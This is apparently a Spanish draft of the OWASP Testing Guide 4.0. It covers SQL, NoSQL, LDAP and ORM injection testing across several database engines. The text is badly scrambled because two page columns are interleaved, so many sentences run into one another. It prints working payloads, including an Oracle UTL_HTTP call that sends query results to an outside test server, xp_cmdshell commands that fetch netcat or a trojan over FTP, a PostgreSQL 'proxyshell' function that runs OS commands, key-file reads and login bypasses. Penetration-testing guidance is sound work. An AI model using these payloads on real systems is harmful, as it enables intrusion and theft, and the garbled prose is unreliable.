MySql: ‘test’ + ‘ing’ Lo que unirá el resultado de la consulta original con todos los números de
tarjeta de crédito en la tabla CreditCardTable. La palabra clave ALL es
S L Server: ‘test’ ‘ing’ necesaria para obtener todas las consultas que utilizan la palabra clave
DISTINCT. Por otra parte, se observa que más allá de los números de tarjeta
Oracle: ‘test’||’ing’ de crédito, hemos seleccionado otros dos valores. Estos dos valores son
necesarios, porque las dos consultas deben tener un número igual de
PostgreS L: ‘test’||’ing’
parámetros o columnas para evitar un error de sintaxis.
http://www.example.com/index.php?id=1’
A través de estas funciones, se ejecutan nuestras pruebas sobre el primer La respuesta obtenida desde el servidor (que es código HTML) será el
carácter y, cuando hemos descubierto el valor, pasaremos al segundo y valor falso para nuestras pruebas. Esto es suficiente para verificar si el
así sucesivamente, hasta que haya descubierto el valor completo. Las valor obtenido mediante la ejecución de la consulta de inferencias es igual
pruebas aprovecharán la función SUBSTRING para seleccionar solo un al valor obtenido con la prueba que se ejecutó previamente.
carácter a la vez (seleccionar un solo carácter significa imponer el
parámetro de longitud en 1) y la función ASCII para obtener el valor
ASCII, y así poder hacer una comparación numérica. Los resultados de la
comparación se obtendrán revisando los valores de la tabla ASCII, hasta A veces este método no funciona. Si el servidor devuelve dos páginas
encontrar el valor correcto. Como ejemplo, usaremos el siguiente valor diferentes como resultado de dos peticiones web consecutivas idénticas,
para Id: no podremos discernir el valor verdadero del valor falso. En estos casos
particulares, es necesario utilizar filtros específicos que nos permiten
eliminar el código que cambia entre las dos peticiones y obtener una
$Id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1 plantilla. Posteriormente, para cada solicitud de inferencias ejecutada,
extraeremos la plantilla relativa de la respuesta usando la misma función,
y realizaremos un control entre las dos plantillas para decidir el resultado
de la prueba.
SELECT field1, field2, field3 FROM Users WHERE Id=’1’ AND ‘1’ =
‘2’
SELECT * FROM products WHERE id_product=$id_product SELECT * FROM products WHERE id_product=$id_product
http://www.example.com/product.php?id=10
http://www.example.com/product.php?id=10
La solicitud maliciosa sería (por ejemplo Oracle 10g): La solicitud maliciosa debería ser:
http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testers
http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOS erver.com:80’||(SELET user FROM DUAL)--
T_NAME( (SELECT user FROM DUAL) )--
En este ejemplo, el evaluador concatena el valor 10 con el resultado de la En este ejemplo, el evaluador comprueba si la versión de MySql es 5.x o no;
función UTL_HTTP.request. Esta función de Oracle intentará conectarse a esto causa que el servidor retrase la respuesta por diez segundos. El probador
'testerserver' y hacer una solicitud HTTP GET que contenga el valor devuelto puede aumentar el tiempo de retraso y monitorear las respuestas.
por la consulta "SELECT user FROM DUAL”. El evaluador puede configurar
un servidor web (Apache por ejemplo) o utilizar la herramienta Netcat:
SELECT * FROM products WHERE id_product=$id_product Create procedure user_login @username varchar(20), @passwd varchar(20)
As Declare @sqlstring varchar(250) Set @sqlstring = ‘ Select 1 from users
Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
exec(@sqlstring) Go
http://www.example.com/product.php?id=10
Referencias
User input: Páginas específicas de tecnología han sido creadas en la Guía de Pruebas para
las siguientes DBMS:
• Oracle
1 from users; update users set password = ‘password’; select *
• MySQL
• SQL Server
Esto resulta en la ejecución del informe y que las contraseñas de todos los
usuarios sean actualizadas.
Libros Blancos
La mayoría de las situaciones y técnicas presentadas aquí pueden • Chris Anley: “Advanced S L Injection In S L Server Applications”:
realizarse de forma automatizada utilizando algunas herramientas. En sparrow.ece.cmu.edu
este artículo, el evaluador puede encontrar información de cómo realizar
una auditoría automatizada usando SQLMap: owasp.org • Chris Anley: “More Advanced S L Injection”: encription.co.uk
utilizan el Gateway PL/SQL incluyen, pero no se limitan tan solo al embargo, la ubicación no es necesariamente /pls. La ausencia de una
servidor HTTP de Oracle, eBusiness Suite, Portal, HTMLDB, WebDB y extensión de archivo en una URL podría indicar la presencia del Gateway
Oracle Application Server. PL/SQL de Oracle. Considere la siguiente URL:
http://www.server.com/aaa/bbb/xxxxx.yyyyy
Cómo probar
http://www.example.com/pls/xyz
http://www.example.com/xyz/owa
http://www.example.com/xyz/plsql
SIMPLEDAD Oracle-Application-Server-10g
PORTAL Oracle-Application-Server-10g/9.0.4.0.0
Cuando se realiza una evaluación en un servidor, primero que nada es importante Oracle HTTP Server Powered by Apache/1.3.22 (Unix)
saber con qué tecnología está tratando realmente. Si no la conoce aún, por ejemplo, mod_plsql/3.0.9.8.3b
en un escenario de evaluación de Caja Negra, entonces lo primero que debe hacer
es descubrir esto. Reconocer una aplicación web PL/SQL es bastante fácil. En Oracle HTTP Server Powered by Apache/1.3.22 (Unix)
primer lugar, como se indicó previamente, está el formato de la URL y su mod_plsql/9.0.2.0.0
visualización. Más allá de eso hay una serie de pruebas sencillas que pueden
realizarse para probar la existencia del Gateway PL/SQL. Oracle_Web_Listener/4.0.7.1.0EnterpriseEdition
Oracle_Web_Listener/4.0.8.2EnterpriseEdition
Los encabezados de respuesta del servidor web son un buen indicador de si el Oracle_Web_listener3.0.2.0.0/2.14FC1
servidor está ejecutando el Gateway PL/SQL. La siguiente tabla muestra algunos
de los encabezados típicos de respuesta del servidor: Oracle9iAS/9.0.2 Oracle HTTP Server
La prueba NULL
SQL> BEGIN
“This page was produced by the PL/S L Cartridge on date” (Esta página
2 NULL; fue producida por el cartucho PL/SQL en la fecha)
3 END;
4 /
“This page was produced by the PL/S L Cartridge on date” (Esta página
fue producida por el cartucho PL/SQL en la fecha)
Podemos utilizar esto para probar si el servidor está ejecutando el
Gateway PL/SQL. Simplemente tome el DAD y anexe NULL, luego adjunte
NOSUCHPROC:
http://www.example.com/pls/dad/null
“This page was produced by the PL/S L Web Toolkit on date” (Esta
página fue producida por el conjunto de herramentas web de PL/SQL en la
fecha) Los ataques de script en sitios cruzados pueden lanzarse mediante un paquete
HTP.
http://www.example.com/pls/dad/HTP.PRINT?CBUF=<script>alert(‘XSS
’)</script>
http://www.example.com/pls/dad/CXTSYS.DRILOAD.VALIDATE_
STMT?SQLSTMT=SELECT+1+FROM+DUAL
http://www.example.com/pls/dad/S%FFS.PACKAGE.PROC
http://www.example.com/pls/dad/S%AFS.PACKAGE.PROC
Algunas versiones del Gateway PL/SQL permiten que la lista de exclusión sea
evitada con una barra invertida - 0x5C:
http://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC
http://www.example.com/pls/dad/foo.bar?xyz=123
1 declare
2 rc__ number;
3 start_time__ binary_integer;
4 simple_list__ owa_util.vc_arr; Mire las líneas 19 y 24. En la línea 19, la solicitud del usuario es revisada
contra un listado de cadenas "malas" conocidas, por ejemplo, la lista de
5 complex_list__ owa_util.vc_arr; exclusión. Si el paquete solicitado y el procedimiento no contienen
cadenas "malas", entonces el procedimiento se ejecuta en la línea 24. El
6 begin parámetro xyz se pasa como una variable de conexión.
7 start_time__ := dbms_utility.get_time;
8 owa.init_cgi_env(:n__,:nm__,:v__);
Entonces, solicitamos lo siguiente:
9 htp.HTBUF_LEN := 255;
10 null; http://server.example.com/pls/dad/INJECT’POINT
11 null;
12 simple_list__(1) := ‘sys.%’;
13 simple_list__(2) := ‘dbms\_%’;
el siguiente PL/SQL se ejecuta:
14 simple_list__(3) := ‘utl\_%’;
..
15 simple_list__(4) := ‘owa\_%’;
20 rc__ := 2;
22 null;
21 else
23 orasso.wpg_session.init();
22 null;
24 inject’point;
23 orasso.wpg_session.init();
29 null;
30 null;
31 commit;
Documento
32 else Pre-release cortesía de Fernando Vela para drangonjar.org
33 rc__ := 0; 180
34 orasso.wpg_session.deinit();
Guia de pruebas 4.0 "Borrador"
JAVA_AUTONOMOUS_TRANSACTION.PUSH http://server.example.com/pls/dad/orasso.home?);--=BAR
XMLGEN.USELOWERCASETAGNAMES
PORTAL.WWV_HTP.CENTERCLOSE
ORASSO.HOME
Esto resulta en que se ejecute la siguiente PL/SQL:
WWC_VERSION.GET_HTTP_DATABASE_INFO
..
orasso.home();--=>:);--);
http://server.example.com/pls/dad/orasso.home?FOO=BAR Note que a todo despues del doble menos (--) se lo trata como
comentario. Esta solicitud causará un error interno del servidor porque
una de las variables de unión no se usa más, así que el atacante necesita
incluirla nuevamente. Cuando esto sucede, la variable de conexión es la
clave para correr un PL/SQL arbitrario. Por el momento, ellos pueden
simplemente usar HTP.PRINT para imprimir BAR, y añadir la variable de
El servidor debe devolver una respuesta "404 File Not Found" (404 conexión requerida como:1:
Archivo no encontrado) porque el procedimiento orasso.home no
requiere parámetros y uno fue provisto. De todas maneras, antes que el
mensaje 404 sea devuelto, la siguiente PL/SQL se ejecutó.
http://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--
=BAR
..
..
if ((owa_match.match_pattern(‘orasso.home’, simple_list__,
complex_list__, true))) then
Esto debe devolver un 200 con la palabra "BAR" en la HTML. Lo que
rc__ := 2; sucede aquí es que todo lo que viene despues del simbolo igual -BAR en
este caso- es la información anexada a la variable de conexión. Usando la
else misma técnica, también es posible obtener acceso a owa_util.cellsprint
nuevamente:
null;
orasso.wpg_session.init();
http://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLS
orasso.home(FOO=>:FOO); PRINT(:1);--=SELECT+USERNAME+FROM+ALL_USERS
..
..
http://www.example.com/pls/dad/orasso.home?);
execute%20immediate%20:1;--
=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20 Si esta solicitud devuelve libros escritos por Charles Dickens, pero
BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDE http://www.example.com/pls/bookstore/books.search?author=DICK’E
X_TABLES NS
(‘INDEX_NAME’,’INDEX_SCHEMA’,’DBMS_OUTPUT.PUT_LIN
E(:p1);
devuelve un error o un 404, entonces puede haber una falla de inyección SQL.
EXECUTE%20IMMEDIATE%20’’CREATE%20OR%20REPLACE Esto puede confirmarse utilizando el operador de concatenación:
%20
http://www.example.com/pls/bookstore/books.search?author=DICK’||’
ENS
PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA
_UTIL’’;
END;--’,’SYS’,1,’VER’,0);END;
Herramientas
• SQLInjector: databasesecurity.com
Evalúe las aplicaciones web PL/SQL personalizadas
• Orascan (Oracle Web Application VA scanner), NGS SQuirreL
Durante las evaluaciones de seguridad de Caja Negra, el código de la
aplicación PL/SQL personalizada no está disponible, pero debe ser
(Oracle RDBMS VA Scanner): nccgroup.com
evaluada en busca de vulnerabilidades de seguridad.
Referencias
Pruebe la inyección de SQL
Libros Blancos
• Hackproofing Oracle Application Server (A Guide to Securing Cabe señalar que en las versiones de MySQL anteriores a 4.0.x, solo los
ataques de inyección ciega booleanos o basados en el tiempo podrían ser
Oracle 9): blackhat.com utilizados, puesto que la funcionalidad de subconsulta de instrucciones
UNION no estaba implementada.
• Oracle PL/SQL Injection: blackhat.com
Cómo probar
• From Version 5.0: Stored procedures, Stored functions and the view named
INFORMATION_SCHEMA
En MySQL, existe una forma estándar para evitar la necesidad de comillas
simples: tener una cadena constante que declarar sin la necesidad de
• From Version 5.0.2: Triggers
comillas simples.
En inyección de banda:
Resultado esperado:
Ejemplo:
Una cadena como esta:
1 /*! and 1=0 */
5.0.22-log
Resultado esperado:
Registro de usuario
Si MySQL está presente, se interpretará la cláusula dentro del bloque de
comentario.
Hay dos tipos de usuarios en los que el servidor MySQL se apoya:
Hay ciertas diferencias entre 1 y 2. La principal es que un usuario anónimo Resultado esperado:
podría conectarse (si se le permite) con cualquier nombre, pero el usuario
interno de MySQL es un nombre vacío (''). Otra diferencia es que un Una cadena como esta:
procedimiento almacenado o una función almacenada se ejecuta como el
usuario creador, si no se declara en otro sitio. Esto puede conocerse mediante dbname
el uso de CURRENT_USER.
Inyección inferencial:
Aquí hay un resumen de algunas vistas interesantes.
Resultado esperado:
user@hostname
Vectores de ataque
Si el usuario conectado tiene privilegios en FILE y las comillas simples no se archivos. Las comillas simples pueden escapar de la desinfección utilizando
escapan, la cláusula 'into outfile' se puede utilizar para exportar los resultados técnicas previamente descritas.
de la consulta en un archivo.
load_file(‘filename’)
Select * from table into outfile ‘/tmp/file’
Resultado esperado:
Nota: no hay ninguna forma de eludir las comillas simples alrededor de un
nombre de archivo. Todo el archivo estará disponible para la exportación mediante el uso de
técnicas estándar.
Así que si hay algún tipo de desinfección sobre las comillas simples como
escape (\'), no habrá ninguna manera de utilizar la cláusula 'into outfile'. Ataque de inyección SQL estandar
Ejemplo:
Resultado esperado:
Inyección SQL fuera de banda
Los resultados se guardan en un archivo con privilegios rw-rw-rw que son
propiedad del usuario y del grupo MySQL. La inyección fuera de banda podría lograrse mediante el uso de la
cláusula 'into outfile'.
LENGTH(str)
Load_file es una función nativa que puede leer un archivo cuando es SUBSTRING(string, offset, #chars_returned)
autorizado por los permisos del sistema de archivo. Si el usuario conectado
tiene privilegios FILE, podría utilizarlos para obtener el contenido de los • Inyección ciega basada en el tiempo: BENCHMARK y SLEEP
• Reversing.org: packetstormsecurity.org
• Los parámetros de aplicación en las cadenas de consulta (por ejemplo,
• Bernardo Damele A. G.: sqlmap, automatic SQL injection tool: solicitud GET)
sqlmap.org • Los parámetros de aplicación incluidos como parte del cuerpo de una
solicitud POST
• Muhaimin Dzulfakar: MySqloit, MySql Injection takeover too:
• Información relacionada con el navegador (por ejemplo, agente usuario,
code.google.com referido)
• sqlsus.sourceforge.net • Información relacionada con el host (por ejemplo, nombre de host, IP)
Libros Blancos
Microsoft SQL server tiene unas características únicas, por lo que algunas
• Chris Anley: “Hackproofing MyS L”: nccgroup.com explotaciones necesitan ser especialmente modificadas para esta
aplicación.
Casos de Estudio
Cómo probar
• Zeelock: Blind Injection in MySQL Databases:
Características del ServidorSQL
http://archive.cert.uni-stuttgart.de
Para empezar, veamos algunos procedimientos de los operadores y
comandos o procedimientos almacenados del SQL Server que son útiles
en la prueba de inyección de SQL:
Pruebas del servidor SQL (SQL Server)
Resumen
[1] operador de comentarios: -
- [sp_makewebtask] Crea un shell de comandos de Windows y pasa una Note el uso de [convert]:
cadena para su ejecución. Cualquier resultado se devuelve como filas de
texto. Esto requiere los privilegios sysadmin (administrador del sistema).
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
- [xp_sendmail] Envía un mensaje de correo electrónico, que puede incluir
un grupo de resultados de consultas adjunto a los destinatarios
especificados. Este procedimiento de almacenamiento extendido utiliza
SQL Mail para enviar el mensaje.
Alternativamente, podemos usar sp_makewebtask: Y aquí está el mismo ataque, pero usando otra vez el truco de conversión:
/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-
Un ejemplo de POST completo:
06,1,’stat’,’name1’,’name2’,2006-01-06,1,@@version%20--
Host: vulnerable.web.app
Keep-Alive: 300
El más simple (y a veces más gratificante) caso sería el de una página de Referer: http://vulnerable.web.app/forgotpass.asp
inicio de sesión que solicita un nombre de usuario y contraseña pare el
inicio de sesión del usuario. Usted puede intentar ingresar la siguiente Content-Type: application/x-www-form-urlencoded
cadena "' o '1' ='1" (sin comillas):
Content-Length: 50
https://vulnerable.web.app/login.asp?Username=’%20or%20’1’=’1&P email=%27&whichSubmit=submit&submit.x=0&submit.y=0
assword=’%20or%20’1’=’1
• Si el código anterior no funciona, significa que el xp_log70.dll ha sido Este código escrito por Antonin Foller (ver enlaces en la parte inferior de
movido o eliminado. En este caso tenemos que inyectar el siguiente código: la página), crea un nuevo xp_cmdshell usando sp_oacreate, sp_oamethod
y sp_oadestroy (siempre que no hayan sido desactivados también, por
supuesto). Antes de usarla, necesitamos eliminar el primer xp_cmdshell
que creamos (incluso si no estaba trabajando), de lo contrario, chocarán
las dos declaraciones.
reconfigure
master..sp_configure ‘xp_cmdshell’,1
reconfigure
Permite la ejecución de código SQL arbitrario. Lo mismo sucede con el Tenga en cuenta que OPENROWSET está habilitado de forma
encabezado User-Agent configurado como: predeterminada en SQL Server 2000 pero deshabilitado en SQL Server
2005.
sp_addextendedproc ‘xp_cmdshell’,’xp_log70.dll’
Una vez que podemos utilizar xp_cmdshell (ya sea el nativo o uno
personalizado), fácilmente podemos subir archivos ejecutables en el
Ejemplo 7: SQL Server como un escáner de puertos servidor de base de datos de destino. Una opción muy común es
netcat.exe, pero cualquier troyano será útil aquí. Si el objetivo es iniciar
En el SQL Server, uno de los comandos más útiles (al menos para el las conexiones FTP en la máquina del evaluador, todo lo que se necesita
evaluador de penetración) es OPENROWSET, que se utiliza para ejecutar es inyectar las siguientes consultas:
una consulta en otro servidor de base de datos y recuperar los resultados.
El evaluador de penetración puede utilizar este comando para escanear En este punto, nc.exe estará cargado y disponible.
puertos de otras máquinas en la red objetivo, al inyectar la siguiente
consulta: exec master..xp_cmdshell ‘echo open ftp.tester.org > ftpscript.txt’;--
Esta consulta intentará una conexión a la dirección x.y.w.z en el puerto p. exec master..xp_cmdshell ‘ftp -s:ftpscript.txt’;--
Si el puerto está cerrado, se devolverá el siguiente mensaje:
exec master..xp_cmdshell ‘echo [debug script line #2 of n] >> select * from books where title=text entered by the user
debugscript.txt’;--
....
Obtener información cuando no es visible (fuera de banda) • En algunos casos la aplicación web (realmente el servidor web) podría
devolver el tradicional 500: Internal Server Error, cuando la aplicación
No todo está perdido cuando la aplicación web no devuelve ninguna devuelve una excepción que puede generarse, por ejemplo, por una
información, como mensajes de error descriptivos (cf. Inyección ciega de consulta con comillas no cerradas.
SQL). Por ejemplo, puede ocurrir que uno tenga acceso al código fuente
(por ejemplo, porque la aplicación web se basa en un software de código • Mientras que en otros casos el servidor devolverá un mensaje 200 OK, la
abierto). Entonces, el evaluador de edición puede explotar todas las aplicación web devolverá un mensaje de error insertado por los
vulnerabilidades de inyección SQL descubiertas fuera de línea en la desarrolladores, por ejemplo Internal server error o bad data.
aplicación web. Aunque un IPS puede detener algunos de estos ataques, la
mejor manera sería proceder así: desarrolle y pruebe los ataques en un
banco de pruebas creado para ello, y luego ejecute estos ataques contra la
aplicación web que se está probando. Esta escasa información sería suficiente para entender cómo se construye
la consulta SQL dinámica mediante la aplicación web y tunear una
explotación. Otro método de fuera de banda es generar los resultados a
través de archivos navegables HTTP.
Otras opciones para los ataques fuera de banda se describen en el
ejemplo 4 anterior.
Ataques temporizados
Ataques de inyección ciega de SQL Hay una posibilidad más para hacer una inyección ciega de SQL cuando
no hay reacción visible de la aplicación: midiendo el tiempo que tarda la
Prueba y error aplicación web para responder a una solicitud. Un ataque de este tipo lo
describe Anley en ([2]) de donde tomamos los siguientes ejemplos. Un
Alternativamente, uno puede jugar a la suerte. El atacante puede asumir enfoque típico utiliza el comando de retraso waitfor: si el atacante quiere
que existe una vulnerabilidad de inyección ciega de SQL o fuera de banda comprobar si existe la base de datos 'pubs', simplemente inyectará el
en la aplicación web. Luego selecciona un vector de ataque (por ejemplo, siguiente comando:
una entrada de la web), utiliza vectores de fuzz (1) contra este canal y
select @i = @i + 1
end
Dependiendo del tiempo que le lleva a la consulta responder, sabremos la
respuesta. De hecho, lo que tenemos aquí son dos cosas: una
vulnerabilidad de inyección SQL y un canal encubierto que permite al
evaluador de penetración conseguir un bit de información de cada Compruebe la versión y las vulnerabilidades
consulta. Por lo tanto, usando varias consultas (cuantas consultas como
bits de información se requieran) el evaluador de edición puede obtener El mismo enfoque de temporización puede utilizarse también para
cualquier información que está en esta base de datos. Mire la siguiente entender de qué versión de SQL Server se trata. Por supuesto
consulta: aprovechamos la variable de @@version incorporada. Considere la
siguiente consulta:
declare @s varchar(8000)
select @@version
declare @i int
select @s = db_name()
Esta consulta esperará cinco segundos si bit '@bit' de byte '@byte' del
nombre de la base de datos actual es 1 y volverá inmediatamente si es 0. Dicha consulta esperará cinco segundos si el carácter número 25 de la variable
Anidando dos ciclos (uno para @byte y otro para @bit) seremos capaces @@version es '5', enseñándonos que estamos tratando con un SQL Server 2005.
de extraer toda la pieza de información. Si la consulta regresa inmediatamente, es probable que estemos tratando con
SQL Server 2000, y otra consulta similar ayudará a despejar todas las dudas.
tool: sqlmap.org
Libros Blancos
- LENGTH(str)
De ahora en adelante se supone que http://www.example.com/news.php?id=1
es vulnerable a ataques de inyección SQL. • Extraer una subcadena desde una cadena dada
- SUBSTR(str,index,offset)
Ejemplos:
Además, la función version() puede utilizarse para atrapar el banner de Adicionalmente, usted puede fácilmente crear una pg_sleep(n) personalizada
PostgreSQL. Esto también mostrará el tipo de sistema operativo en las versiones previas usando libc:
subyacente y la versión.
Ejemplo: Las cadenas pueden codificarse para prevenir la fuga de comillas simples,
usando la función chr().
Inyección ciega
Para los ataques de inyección ciega de SQL, debe tomar en consideración las
siguientes funciones incorporadas:
111
select ascii(‘t’)
116
Base de datos actual
chr(114)||chr(111)||chr(111)||chr(116)
Ejemplo:
Vectores de Ataque
La identidad del usuario actual se puede recuperar con las siguientes • función interna pg_read_file() (desde PostgreSQL 8.1)
instrucciones SQL SELECT:
SELECT user
SELECT current_user
COPY:
SELECT session_user
Este operador copia datos entre un archivo y una tabla. El motor PostgreSQL
accede al sistema de archivos local como un usuario postgres.
SELECT usename FROM pg_user
SELECT getpgusername()
Ejemplo
Ejemplos:
• SELECT pg_read_file(‘server.key’,0,1000);
• SELECT system_out FROM stdout • CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os;
return os.popen(args[0]).read() ‘LANGUAGE plpythonu
Ejemplo:
[4] Diviertase con:
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- • SELECT proxyshell(os command);
/store.php?id=1; COPY stdout(system_out) FROM ‘/tmp/test’ -- • /store.php?id=1 UNION ALL SELECT NULL, proxyshell(‘whoami’),
NULL OFFSET 1;--
• SELECT count(*) FROM pg_language WHERE lanname=’plpythonu’ [2] Si no, asumiendo que sysadm ha instalado el paquete plperl, intente:
• CREATE LANGUAGE plpythonu [3] Si cualquiera de las anteriores tuvo éxito, cree una función de proxy shell:
[4] Diviértase con: ejemplo, una cita, comilla doble, ...) para activar las excepciones de la base
de datos. Suponiendo que la aplicación no maneja excepciones con
• SELECT proxyshell(os command); páginas personalizadas, es posible marcar con huellas digitales, la DBMS
subrayada mediante la observación de los mensajes de error.
Ejemplo:
Dependiendo de la tecnología web específica utilizada, las aplicaciones
[1] Cree una función proxy shell: dirigidas por MS Access responderán con uno de los siguientes errores:
• Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool -
http://sqlmap.sourceforge.net Microsoft Office Access Database Engine
• No comments characters
Como probar
• No stacked queries
Marque con huellas digitales
• No LIMIT operator
Dejar huellas digitales en la tecnología específica de la base de datos
• No SLEEP or BENCHMARK alike operators
mientras se prueba la aplicación de SQL es el primer paso para evaluar
correctamente los posibles puntos vulnerables. Un método común
• and many others
implica inyectar patrones de ataque de inyección de SQL estándar (por
http://www.example.com/page.app?user=admin’%16&pass=foo
Enumeración de atributos
‘ GROUP BY Id%00
http://www.example.com/page.app?id=2’+UNION+SELECT+TOP+3
+name+FROM+appsTable%00
Obtención del esquema de base de datos últimas versiones de MS Access, tampoco es posible ejecutar comandos
de shell o archivos arbitrarios de leer/escribir.
Existen varias tablas por defecto del sistema en MS Access que pueden
utilizarse potencialmente para obtener nombres de tablas y columnas.
Por desgracia, en la configuración predeterminada de versiones recientes
de bases de datos de MS Access, estas tablas no son accesibles. Sin En el caso de las inyecciones ciegas de SQL, el atacante puede deducir el
embargo, siempre vale la pena probar: resultado de la consulta únicamente mediante la evaluación de las
diferencias de tiempo o las respuestas de la aplicación. Se supone que el
lector ya sabe la teoría detrás de los ataques de inyección ciega de SQL, ya
que la parte restante de esta sección se centrará en detalles específicos de
• MSysObjects MS Access.
• MSysACEs
http://www.example.com/index.php?myId=[sql]
Por ejemplo, si existe una vulnerabilidad de inyección union de SQL, puede usar la
siguiente consulta:
http://www.example.com/index.php?id=IIF((select%20MID(LAST(us
ername),1,1)%20from%20(select%20TOP%2010%20username%20fr
om%20users))=’a’,0,’no’)
Mediante la combinación de las funciones IFF, MID, LAST y TOP, es [1] Probar todos los valores imprimibles, hasta que encontramos una
posible extraer el primer carácter del nombre de usuario en una fila coincidencia.
seleccionada específicamente. Como la consulta interna devuelve un
conjunto de registros y no sólo uno, no es posible utilizarlo directamente. [2] Deducir la longitud de la cadena utilizando la función LEN o
Afortunadamente, podemos combinar varias funciones para extraer una simplemente parando después de que hemos encontrado todos los
cadena específica. caracteres.
• http://packetstormsecurity.com/files/65967/Access-Through-
Access.pdf.html
Luego, utilizando este subconjunto, podemos extraer la última fila con la • http://seclists.org/pen-test/2003/May/74
función LAST. Una vez que tenemos sólo una fila y exactamente la fila que
contiene la cadena, podemos utilizar las funciones IFF, MID y LAST para • http://www.techonthenet.com/access/functions/index_
inferir el valor real del nombre de usuario. En nuestro ejemplo,
alpha.php
empleamos IFF para devolver un número o una cadena. Con este truco,
podemos distinguir si tenemos una respuesta verdadera o no, observando
• http://en.wikipedia.org/wiki/Microsoft_Access
las respuestas de error de la aplicación. Como la identificación es
numérica, puede compararse con una cadena de resultados en un error
SQL que puede ser potencialmente filtrado por páginas 500 de Error
interno del servidor. De lo contrario, probablemente se devolverá una Pruebas de inyección NoSQL
página 200 OK estándar.
Resumen
Hoy encontramos más de 150 bases de datos NoSQL disponibles[3] para Opcionalmente, JavaScript tambien se evalúa para permitir condiciones más
usarlas dentro de una aplicación, y que proporcionan API en una variedad avanzadas.
de lenguajes y modelos de relación. Cada una ofrece diferentes
características y restricciones. Ya que no hay un lenguaje común entre
ellas, una inyección de código de ejemplo no aplica a través de las bases db.myCollection.find( { $where: function() { return obj.credits -
obj.debits < 0; } } );
de datos NoSQL. Por esta razón, cualquier persona que va a probar los
ataques de inyección de NoSQL tendrá que familiarizarse con la sintaxis,
modelo de datos y lenguaje de programación relacionada para poder
elaborar pruebas específicas.
Ejemplo 1
Los ataques de inyección de NoSQL pueden ejecutarse en diferentes áreas
de una aplicación que la inyección de SQL tradicional. Mientras la Si un atacante es capaz de manipular los datos entregados en el operador
inyección SQL se ejecutaría dentro del motor de la base de datos, las $where, ese atacante podría incluir JavaScript arbitrario para que sea
variantes NoSQL pueden ejecutarse dentro de la capa de aplicación o la evaluado como parte de la consulta de MongoDB. Un ejemplo de una
capa de base de datos, dependiendo de la API de NoSQL y el modelo de vulnerabilidad se expone en el siguiente código, si el ingreso del usuario
datos usado. Por lo general, los ataques de inyección de NoSQL se se pasa directamente a la consulta de MongoDB sin desinfección.
ejecutarán donde la cadena de ataque es analizada, evaluada o
concatenada con una comunicación a la API de NoSQL.
b.myCollection.find( { active: true, $where: function() { return
obj.credits - obj.debits < $userInput; } } );;
Cómo probar
Para probar las vulnerabilidades de inyección de NoSQL en MongoDB: Por ejemplo, en MongoDB, si se pasa una cadena que contiene cualquiera
de los siguientes caracteres especiales sin desinfectar, desencadenaría un
El API de MongoDB espera comunicaciones BSON (Binary JSON) e incluye error de base de datos.
una herramienta para ensamblar consultas BSON seguras. Sin embargo,
según la documentación de MongoDB - expresiones no seriales de JSON y ‘“ \;{}
JavaScript se permiten en varios parámetros de una consulta
alternativa.[4] La comunicación API más utilizada que permite ingresos
de JavaScript arbitrarios es el operador $where.
Referencias
Por ejemplo, en MongoDB, la sintaxis $where es un operador de consulta
reservado. Tiene que ser enviado dentro de la consulta exactamente Libros Blancos
como se muestra; cualquier alteración causaría un error de base de datos.
• Bryan Sullivan from Adobe: “Server-Side JavaScript Injection”:
media.blackhat.com
Sin embargo, como $where también es un nombre válido de variable de • Bryan Sullivan from Adobe: “NoS L, But Even Less Security”:
PHP, es posible para un atacante insertar un código en la consulta blogs.adobe.com
mediante la creación de una variable PHP llamada $where. La
documentación de PHP MongoDB explícitamente advierte a los • Erlend from Bekk Consulting: “[Security] NOS L-injection”:
desarrolladores: erlend.oftedal.no
Resumen
Una aplicación web podría utilizar LDAP para permitir a los usuarios
autenticarse o buscar información de otros usuarios dentro de una
estructura corporativa. El objetivo de los ataques de inyección LDAP es
inyectar meta caracteres de filtros de búsqueda LDAP en consultas que
serán ejecutadas por la aplicación.
Cómo probar
Las condiciones booleanas y agregaciones de grupo en un filtro de
búsqueda LDAP pueden aplicarse utilizando los siguientes Ejemplo 1: Filtros de búsqueda
metacaracteres:
Supongamos que tenemos una aplicación web que utiliza un filtro de
búsqueda como el siguiente:
searchfilter=”(cn=”+user+”)”
pass=password
http://www.example.com/ldapsearch?user=*
searchfilter=”(cn=*)” X03MO1qnZdYdgyfeuILPmQ==))”;
Herramientas
Si la aplicación es vulnerable a una inyección LDAP, se mostrarán algunos
o todos los atributos de los usuarios, dependiendo del flujo de ejecución
• Softerra LDAP Browser: dapadministrator.com
de la aplicación y los permisos del LDAP del usuario conectado.
Referencias
Un evaluador podría utilizar un enfoque de prueba y error, introduciendo
en el parámetro '(', '|', '&', ' *' y los otros caracteres, con el fin de verificar
Libros Blancos
los errores de la aplicación.
• Sacha Faust: “LDAP Injection: Are Your Applications Vulnerable?”:
networkdls.com
Si una aplicación web utiliza LDAP para comprobar las credenciales de • IBM paper: “Understanding LDAP”: redbooks.ibm.com
usuario durante el proceso de inicio de sesión y es vulnerable a una
inyección LDAP, es posible evitar la comprobación de autenticación • RFC 1960: “A String Representation of LDAP Search Filters”: ietf.org
mediante la inyección de una consulta LDAP que siempre es verdadera
(de una manera similar a la inyección SQL y XPATH).
Supongamos que una aplicación web utiliza un filtro para emparejar la Resumen
combinación LDAP de usuario/contraseña.
La inyección de ORM es un ataque de inyección SQL contra un modelo de Pruebas de Caja Gris
objetos de acceso de datos generado mediante ORM. Desde el punto de vista
del evaluador, este ataque es virtualmente idéntico a un ataque de inyección Si el evaluador tiene acceso al código fuente de una aplicación web, o
SQL. Sin embargo, la vulnerabilidad de inyección existe en el código puede descubrir las vulnerabilidades de una herramienta ORM y prueba
generado por la herramienta ORM. aplicaciones que utiliza esta herramienta web, hay una mayor
probabilidad de atacar con éxito a la aplicación.
